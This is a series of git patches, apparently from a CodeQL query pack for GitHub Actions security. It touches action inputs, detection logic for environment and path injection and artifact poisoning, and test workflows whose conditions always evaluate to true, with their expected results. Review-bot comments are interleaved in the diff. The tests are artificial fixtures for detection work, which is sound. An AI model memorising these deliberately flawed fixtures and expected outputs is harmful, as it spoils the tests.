diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 4c98f1d6301..6f4a57b10fb 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "githubsecuritylab/actions-all", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), @@ -28706,6 +28706,15 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; + const extPackPath = process.env["EXTPACK_PATH"]; + const extPackName = process.env["EXTPACK_NAME"]; + if (extPackPath !== undefined && + extPackName !== undefined && + extPackPath !== "" && + extPackName !== "") { + cmd.push("--additional-packs", extPackPath); + cmd.push("--extension-packs", extPackName); + } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json index eef94f4b5cd..9cacb7f9af9 100644 --- a/.github/action/package-lock.json +++ b/.github/action/package-lock.json @@ -15,7 +15,7 @@ "@actions/tool-cache": "^2.0.1" }, "devDependencies": { - "@types/node": "^20.6.0", + "@types/node": "^20.12.7", "@vercel/ncc": "^0.38.0", "prettier": "^3.0.3", "typescript": "^5.2.2" 
@@ -195,9 +195,9 @@ } }, "node_modules/@types/node": { - "version": "20.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", - "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "version": "20.12.7", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", + "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", "dev": true, "dependencies": { "undici-types": "~5.26.4" @@ -520,9 +520,9 @@ } }, "@types/node": { - "version": "20.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", - "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "version": "20.12.7", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", + "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", "dev": true, "requires": { "undici-types": "~5.26.4" diff --git a/.github/action/package.json b/.github/action/package.json index 90512a3163c..cd9021d20c5 100644 --- a/.github/action/package.json +++ b/.github/action/package.json @@ -40,7 +40,7 @@ "@actions/tool-cache": "^2.0.1" }, "devDependencies": { - "@types/node": "^20.6.0", + "@types/node": "^20.12.7", "@vercel/ncc": "^0.38.0", "prettier": "^3.0.3", "typescript": "^5.2.2" diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index e845ec9fd4f..b318cb1b3e2 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -149,7 +149,12 @@ export async function codeqlDatabaseAnalyze( const extPackPath = process.env["EXTPACK_PATH"]; const extPackName = process.env["EXTPACK_NAME"]; - if (extPackPath !== undefined && extPackName !== undefined) { + if ( + extPackPath !== undefined && + extPackName !== undefined && + extPackPath !== "" && + extPackName !== "" + ) { cmd.push("--additional-packs", extPackPath); cmd.push("--extension-packs", extPackName); } diff --git a/action.yml b/action.yml index 9580cff83e8..addc5588b8d 100644 --- a/action.yml +++ b/action.yml @@ -33,18 +33,9 @@ runs: mkdir workflow-extpack cd workflow-extpack - # Store the extension pack file - cat > models.json << 'EOF' - ${{ inputs.workflow-models }} - EOF - # Store the extension pack file cat > models.yml << 'EOF' - extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: workflowDataModel - data: [] + ${{ inputs.workflow-models }} EOF # Create QLPack @@ -69,7 +60,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ inputs.extpack-path }} - EXTPACK_NAME: ${{ inputs.extpack-name }} + EXTPACK_PATH: ${{ env.EXTPACK_PATH }} + EXTPACK_NAME: ${{ env.EXTPACK_NAME }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 858df49012e2583ce58303cb74404ca9744aa2f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:08:27 +0200 Subject: [PATCH 0215/1267] Generate yaml file --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- action.yml | 10 ++++++++++ 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 6f4a57b10fb..4a60299ef0f 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
@@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-all", + pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index b318cb1b3e2..842af1c8b17 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-all", + pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/action.yml b/action.yml index addc5588b8d..a9f9b2ad6cb 100644 --- a/action.yml +++ b/action.yml @@ -52,6 +52,16 @@ runs: echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV + - name: Show contents + shell: bash + run: | + echo "Directory contents" + ls -la + echo "Models" + if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi + echo "QLPack" + if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + - name: Scan workflows shell: bash env: From 5cd8d70a9cfe2eb5521fd932585bf660c044ed53 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:09:06 +0200 Subject: [PATCH 0216/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 00b31b33bf5..f6efd7fa0f1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.16 +version: 0.0.17 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index dc9c140e60f..9e8fdef850a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.16 +version: 0.0.17 groups: - actions - queries From 6237a8e24cd2bda5c27d4293c4a15f3af2764ed6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:27:44 +0200 Subject: [PATCH 0217/1267] Update action.yml --- action.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/action.yml b/action.yml index a9f9b2ad6cb..4b99389767c 100644 --- a/action.yml +++ b/action.yml @@ -28,15 +28,15 @@ runs: - name: Process workflow models shell: bash if: inputs.workflow-models + env: + DATA: ${{ inputs.workflow-models }} run: | # Create QLPack directory mkdir workflow-extpack cd workflow-extpack # Store the extension pack file - cat > models.yml << 'EOF' - ${{ inputs.workflow-models }} - EOF + echo $DATA > models.yml # Create QLPack cat > qlpack.yml << 'EOF' @@ -55,8 +55,6 @@ runs: - name: Show contents shell: bash run: | - echo "Directory contents" - ls -la echo "Models" if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi echo "QLPack" From 16cf60af008300fea37973242fa894d7668809b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 15:05:40 +0200 Subject: [PATCH 0218/1267] Add double quotes to env var --- action.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index 4b99389767c..ca9a5446434 100644 --- a/action.yml +++ b/action.yml 
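Review bot: `echo $DATA > models.yml` in the `@@ -28,15 +28,15 @@` hunk of action.yml expands the variable unquoted, so bash word-splits it. The newlines and indentation of the YAML model collapse into single spaces, and any glob characters are expanded against the working directory. Moving the input into `env:` is the right direction, but the write should be `printf '%s\n' "$DATA" > models.yml`.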
@@ -29,14 +29,14 @@ runs: shell: bash if: inputs.workflow-models env: - DATA: ${{ inputs.workflow-models }} + MODELS: ${{ inputs.workflow-models }} run: | # Create QLPack directory mkdir workflow-extpack cd workflow-extpack # Store the extension pack file - echo $DATA > models.yml + echo "$MODELS" > models.yml # Create QLPack cat > qlpack.yml << 'EOF' From 944bd84a58f61450f368bd6d035ce523b54c9629 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 15:15:16 +0200 Subject: [PATCH 0219/1267] Add missing spaces --- action.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index ca9a5446434..010e28c6a28 100644 --- a/action.yml +++ b/action.yml @@ -55,10 +55,12 @@ runs: - name: Show contents shell: bash run: | - echo "Models" + echo "##[group] Workflow Models" if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi - echo "QLPack" + echo "##[endgroup]" + echo "##[group] QLPack" if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + echo "##[endgroup]" - name: Scan workflows shell: bash From c9b2dac128f9c885305f79867c7b8a41babc095e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 15:07:05 +0200 Subject: [PATCH 0220/1267] Update action.yml --- action.yml | 49 ++++++++++++------------------------------------- 1 file changed, 12 insertions(+), 37 deletions(-) diff --git a/action.yml b/action.yml index 010e28c6a28..6a1285de0de 100644 --- a/action.yml +++ b/action.yml 
@@ -5,61 +5,36 @@ inputs: token: description: GitHub Token default: ${{ github.token }} - source-root: description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." default: ${{ github.workspace }} - sarif-output: description: "SARIF File Output" default: "codeql-actions.sarif" - suite: description: "CodeQL Suite to run" default: "actions-code-scanning" - - workflow-models: - description: "Workflow models" + workflow-extpack-path: + description: "Path to Workflow extpack" + required: false + workflow-extpack-name: + description: "Name of the Workflow extpack" required: false runs: using: 'composite' steps: - - name: Process workflow models + - name: extpack contents shell: bash - if: inputs.workflow-models env: - MODELS: ${{ inputs.workflow-models }} - run: | - # Create QLPack directory - mkdir workflow-extpack - cd workflow-extpack - - # Store the extension pack file - echo "$MODELS" > models.yml - - # Create QLPack - cat > qlpack.yml << 'EOF' - name: local/workflow-models - library: true - extensionTargets: - githubsecuritylab/actions-all: '*' - dataExtensions: - - models.yml - EOF - - # Set env vars - echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV - echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV - - - name: Show contents - shell: bash + EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | echo "##[group] Workflow Models" - if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi + if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + if [ -f $EXTPACK_PATH/qlpack.yml ]; then cat $EXTPACK_PATH/qlpack.yml; fi echo "##[endgroup]" - name: Scan workflows 
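Review bot: `EXTPACK_PATH: ${{ intpus.workflow-extpack-path }}` misspells the `inputs` context, here in the "extpack contents" step and again in the `@@ -70,7 +45,7 @@` hunk for the "Scan workflows" step, so the expression cannot resolve to the input; it should read `EXTPACK_PATH: ${{ inputs.workflow-extpack-path }}`. Separately, `$EXTPACK_PATH` is unquoted in `[ -f $EXTPACK_PATH/models.yml ]` and the matching `cat`. With the optional input unset these test `/models.yml` and `/qlpack.yml` at the filesystem root, and a path containing spaces breaks the test. Guarding with `if [ -n "$EXTPACK_PATH" ] && [ -f "$EXTPACK_PATH/models.yml" ]; then cat "$EXTPACK_PATH/models.yml"; fi`, and the same for qlpack.yml, avoids both.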
@@ -70,7 +45,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ env.EXTPACK_PATH }} - EXTPACK_NAME: ${{ env.EXTPACK_NAME }} + EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From fbf03fa8e2f7de8eff01d29ef167f7d9f82fcf14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 21:51:27 +0200 Subject: [PATCH 0221/1267] New expression is always true tests --- .../CWE-571/.github/workflows/test.yml | 36 +++++++++++++++---- .../CWE-571/ExpressionIsAlwaysTrue.expected | 4 +++ 2 files changed, 33 insertions(+), 7 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml index 30c4dcab932..4ed45ff973e 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -1,12 +1,12 @@ -name: Conditionally process PR +name: Event on: - pull_request_target: - types: [opened, synchronize, reopened] + workflow_dispatch: jobs: - process-pr: + if-tests: runs-on: ubuntu-latest + permissions: {} steps: - name: Test 1 if: 1 == 2 @@ -36,10 +36,10 @@ jobs: - name: Test 7 run: echo "Test 7 should not be printed" if: ${{ - github.actor == 'torvalds' || - github.actor == 'dependabot[bot]' + 1 == 2 || + 3 == 4 }} - + - name: Test 8 run: echo "Test 8 should not be printed" if: 
> @@ -87,3 +87,25 @@ jobs: false || 1 == 2 )}} run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.event_name }} == 'foo' + run: echo "Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected index a8f068c9cd8..d4c16131cc2 100644 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected @@ -5,3 +5,7 @@ | .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | | .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | | .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test.yml:100:13:102:63 | > | Expression always evaluates to true | 
From 0ff967b102d640c77324619f24092c6f61e9ddc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 22:07:18 +0200 Subject: [PATCH 0222/1267] Fix typo --- action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 6a1285de0de..0f7b2ef49ff 100644 --- a/action.yml +++ b/action.yml @@ -27,7 +27,7 @@ runs: - name: extpack contents shell: bash env: - EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | echo "##[group] Workflow Models" From 39308fd89f2ca63366f2ad1e3a9e23d7130f15c4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 22:09:03 +0200 Subject: [PATCH 0223/1267] Fix typo --- action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 0f7b2ef49ff..35c423e103d 100644 --- a/action.yml +++ b/action.yml @@ -45,7 +45,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 27d0a3406dd9fad12f1b2bcdea8634465d7bcac4 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 26 Apr 2024 16:17:29 +0200 Subject: [PATCH 0224/1267] Improve Env path/var injection queries --- ql/lib/codeql/actions/Ast.qll | 4 + ql/lib/codeql/actions/ast/internal/Ast.qll | 19 +- .../actions/controlflow/internal/Cfg.qll | 8 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 33 +- .../dataflow/internal/DataFlowPrivate.qll | 3 +- .../security/ArtifactPoisoningQuery.qll | 7 +- .../security/EnvPathInjectionQuery.qll | 58 +- .../actions/security/EnvVarInjectionQuery.qll | 56 +- ql/lib/qlpack.yml | 2 +- .../CodeExecutionOnSelfHostedRunner.ql | 47 ++ ql/src/qlpack.yml | 2 +- ql/test/library-tests/test.actual | 598 ++++++++++++++++++ .../.github/workflows/sonar-source.yml | 75 --- .../CWE-077/.github/workflows/test1.yml | 20 +- .../CWE-077/.github/workflows/test2.yml | 34 +- .../CWE-077/.github/workflows/test3.yml | 47 +- .../CWE-077/.github/workflows/test4.yml | 29 +- .../CWE-077/.github/workflows/test5.yml | 36 ++ .../CWE-077/EnvPathInjection.expected | 20 +- .../Security/CWE-077/EnvVarInjection.expected | 39 +- .../PrivilegedEnvPathInjection.expected | 26 + .../CWE-077/PrivilegedEnvPathInjection.qlref | 1 + .../PrivilegedEnvVarInjection.expected | 53 +- .../Security/CWE-094/CodeInjection.expected | 6 +- .../CWE-094/PrivilegedCodeInjection.expected | 6 +- .../CWE-200/.github/workflows/test1.yml | 46 +- .../CWE-200/SecretExfiltration.expected | 20 +- .../CWE-284/.github/workflows/test1.yml | 28 + .../CWE-284/.github/workflows/test2.yml | 26 + .../CodeExecutionOnSelfHostedRunner.expected | 4 + .../CodeExecutionOnSelfHostedRunner.qlref | 2 + .../CWE-829/ArtifactPoisoning.expected | 52 +- .../PrivilegedArtifactPoisoning.expected | 78 +-- 33 files changed, 1063 insertions(+), 422 deletions(-) create mode 100644 ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql create mode 100644 ql/test/library-tests/test.actual delete mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/sonar-source.yml create mode 
100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected create mode 100644 ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 7c4bf9aa8af..8e36aef408e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -298,6 +298,8 @@ abstract class Job extends AstNode instanceof JobImpl { Strategy getStrategy() { result = super.getStrategy() } predicate isPrivileged() { super.isPrivileged() } + + string getARunsOnLabel() { result = super.getARunsOnLabel() } } class LocalJob extends Job instanceof LocalJobImpl { @@ -352,6 +354,8 @@ class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } class Run extends Step instanceof RunImpl { string getScript() { result = super.getScript() } + ScalarValue getScriptScalar() { result = super.getScriptScalar() } + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7cc70c86d20..0c53dae6371 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -579,10 +579,12 @@ class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; WorkflowImpl workflow; + YamlMappingLikeNode runson; JobImpl() { this = TJobNode(n) and - workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n and + runson = n.lookup("runs-on").(YamlMappingLikeNode) } override string toString() { result = "Job: " + jobId } @@ -660,6 +662,19 @@ class JobImpl extends AstNodeImpl, TJobNode { // The enclosing workflow is privileged this.getEnclosingWorkflow().isPrivileged() } + + /** Gets the runs-on field of the job. */ + string getARunsOnLabel() { + exists(string lbl, YamlNode r | + ( + r = runson.getNode(lbl) and + not lbl = ["group", "labels"] + or + r = runson.getNode("labels").(YamlMappingLikeNode).getNode(lbl) + ) and + result = lbl.trim().regexpReplaceAll("^('|\")", "").regexpReplaceAll("('|\")$", "").trim() + ) + } } class LocalJobImpl extends JobImpl { @@ -865,6 +880,8 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue() } + ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } override string toString() { diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index f3785eada37..0db8d63e6f3 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -260,7 +260,11 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr()) and + ( + child = super.getInScopeEnvVarExpr(_) or + child = super.getAnScriptExpr() or + child = super.getScriptScalar() + ) and l = child.getLocation() | child 
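Review bot: Binding the new field in the characteristic predicate with `runson = n.lookup("runs-on").(YamlMappingLikeNode)` makes `runs-on` a precondition for being a `JobImpl` at all, so a job mapping without that key would no longer be modelled as a job. Jobs that call a reusable workflow through `uses:` normally have no `runs-on`, which suggests the `ExternalJob` side of the hierarchy is affected; this is inferred, since the rest of `JobImpl` lies outside the hunk. Dropping the field and doing the lookup inside `getARunsOnLabel()` keeps the label extraction without narrowing the class, e.g. `exists(YamlMappingLikeNode runson | runson = n.lookup("runs-on") | ...)`. The QLDoc on `getARunsOnLabel()` in the `@@ -660,6 +662,19 @@` hunk would also be more accurate as `/** Gets a label from the runs-on field of the job. */`.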
@@ -291,3 +295,5 @@ private class InputTree extends LeafTree instanceof Input { } private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } private class ExpressionLeaf extends LeafTree instanceof Expression { } + +predicate test(ScalarValueLeaf f) { any() } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4e049615045..b24f9484a80 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -33,9 +33,13 @@ class AdditionalTaintStep extends Unit { predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and - succ.asExpr() = run + ( + Utils::writeToGitHubEnv(run, _, value) or + Utils::writeToGitHubOutput(run, _, value) or + Utils::writeToGitHubPath(run, value) + ) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + succ.asExpr() = run.getScriptScalar() ) } @@ -85,12 +89,9 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da exists(Run run, string key, string value, UntrustedArtifactDownloadStep download | c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and - pred.asExpr() = run and + pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run and - ( - Utils::writeToGitHubOutput(run, key, value) or - Utils::writeToGitHubEnv(run, key, value) - ) and + Utils::writeToGitHubOutput(run, key, value) and value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } 
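Review bot: `predicate test(ScalarValueLeaf f) { any() }` at the end of Cfg.qll looks like a debugging leftover. It is a public, undocumented predicate with a generic name in a library file, and its body does not constrain `f` beyond its type. If it is not needed, delete it; if it is kept for inspection, mark it `private` and give it a descriptive name and a QLDoc comment.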
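Review bot: In `envToRunStep`, `value.matches("%$" + ["", "{", "ENV{"] + varName + "%")` is a substring test, so a tainted variable `TITLE` also matches a script that only writes `$TITLE_SAFE`. Because `_` is a single-character wildcard in `matches` patterns, names containing underscores match more loosely still. The same pattern is used in `EnvPathInjectionFromEnvVarSink` and `EnvVarInjectionFromEnvVarSink` later in this commit. Anchoring the end of the name would cut these false positives, e.g. `value.regexpMatch("(?s).*\\$(\\{|ENV\\{)?" + varName + "\\b.*")`. The predicate's doc comment starts outside the hunk.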
@@ -99,7 +100,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF exists(Run run, string key, string value, UntrustedArtifactDownloadStep download | c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and - pred.asExpr() = run and + pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and Utils::writeToGitHubEnv(run, key, value) and @@ -110,12 +111,16 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF /** * A download artifact step followed by a step that may use downloaded artifacts. */ +predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UntrustedArtifactDownloadStep download, Run run | + pred.asExpr() = download and + succ.asExpr() = run.getScriptScalar() and + download.getAFollowingStep() = run + ) +} + class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - exists(UntrustedArtifactDownloadStep download, Run run | - node1.asExpr() = download and - node2.asExpr() = run and - download.getAFollowingStep() = run - ) + artifactDownloadToUseStep(node1, node2) } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 3cbb940131c..f63af3c10be 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -61,7 +61,8 @@ class DataFlowExpr extends Cfg::Node { this.getAstNode() instanceof Uses or this.getAstNode() instanceof Run or this.getAstNode() instanceof Outputs or - this.getAstNode() instanceof Input + this.getAstNode() instanceof Input or + this.getAstNode() instanceof ScalarValue } } 
